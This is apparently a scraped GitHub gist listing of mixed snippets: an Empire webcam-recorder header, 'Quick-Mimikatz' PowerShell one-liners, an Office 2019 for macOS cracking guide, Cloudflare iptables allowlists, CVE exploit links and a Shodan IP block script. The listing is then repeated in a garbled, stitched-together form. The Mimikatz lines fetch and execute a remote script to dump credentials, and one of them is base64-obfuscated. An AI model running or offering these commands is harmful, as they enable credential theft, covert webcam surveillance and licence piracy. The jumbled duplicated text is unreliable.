woOzZ2

## webcam.ps1
# Taken from : https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py
function Start-WebcamRecorder
{
  <#
  .SYNOPSIS
  This function utilizes the DirectX and DShowNET assemblies to record video from the host's webcam.
  Author: Chris Ross (@xorrior)
  License: BSD 3-Clause
  .DESCRIPTION
  This function will capture video output from the hosts webcamera. Note that if compression is available, there isn't

## Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*

#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl

## Activate Office 2019 for macOS VoL.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                woOzZ2
                / Activate Office 2019 for macOS VoL.md
            
            
              Created
              April 2, 2023 10:29
                — forked from zthxxx/Activate Office 2019 for macOS VoL.md
            
              
                crack activate office on mac with license file
              
          
    Activate MS Office 2019/2016 for macOS - Microsoft_Office_2019_VL_Serializer

Office 2019 above

2019-06-03
Note that Office2019 DO NOT support activate via simple copy/paste plist license file which is the simplest way to activate Office 2016.
Fortunately, you can also use the VL Serializer tool, just install Office 2019 and Serializer, then run Serializer to activate.
Ref


## cloudflare.sh
# Source:
# https://www.cloudflare.com/ips
# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-

for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done

# Avoid racking up billing/attacks
# WARNING: If you get attacked and CloudFlare drops you, your site(s) will be unreachable.
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP

## gist:886764e1cecf281ec5aded46488bc1a2
# https://www.cloudflare.com/ips
# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-

for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done

## cves.txt
CVEs:

• http://blog.ptsecurity.com/2020/03/cve-2019-18683-exploiting-linux-kernel.html
  Exploiting a Linux kernel vuln. in the V4L2 subsystem (CVE-2019-18683).

• https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
  Turning \x00\x00 into 10000$ (CVE-2021-22555).

• https://coreruleset.org/20210630/cve-2021-35368-crs-request-body-bypass/
  CRS Request Body Bypass (CVE-2021-35368).

## antiautosploit.py
#!/usr/bin/python3
import os

shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38",  "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142",  "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107",  "98.143.148.135"]

for ip in shodan:
    os.system("iptables -A INPUT -s {} -j DROP".format(ip))
	# Taken from : https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py
	function Start-WebcamRecorder
	{
	<#
	.SYNOPSIS
	This function utilizes the DirectX and DShowNET assemblies to record video from the host's webcam.
	Author: Chris Ross (@xorrior)
	License: BSD 3-Clause
	.DESCRIPTION
	This function will capture video output from the hosts webcamera. Note that if compression is available, there isn't
	NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!

	#mimikatz [local]
	IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

	#encoded-mimikatz [local]
	powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
	# Source:
	# https://www.cloudflare.com/ips
	# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-

	for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
	for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done

	# Avoid racking up billing/attacks
	# WARNING: If you get attacked and CloudFlare drops you, your site(s) will be unreachable.
	iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP
	CVEs:

	• http://blog.ptsecurity.com/2020/03/cve-2019-18683-exploiting-linux-kernel.html
	Exploiting a Linux kernel vuln. in the V4L2 subsystem (CVE-2019-18683).

	• https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
	Turning \x00\x00 into 10000$ (CVE-2021-22555).

	• https://coreruleset.org/20210630/cve-2021-35368-crs-request-body-bypass/
	CRS Request Body Bypass (CVE-2021-35368).
	#!/usr/bin/python3
	import os

	shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"]

	for ip in shodan:
	os.system("iptables -A INPUT -s {} -j DROP".format(ip))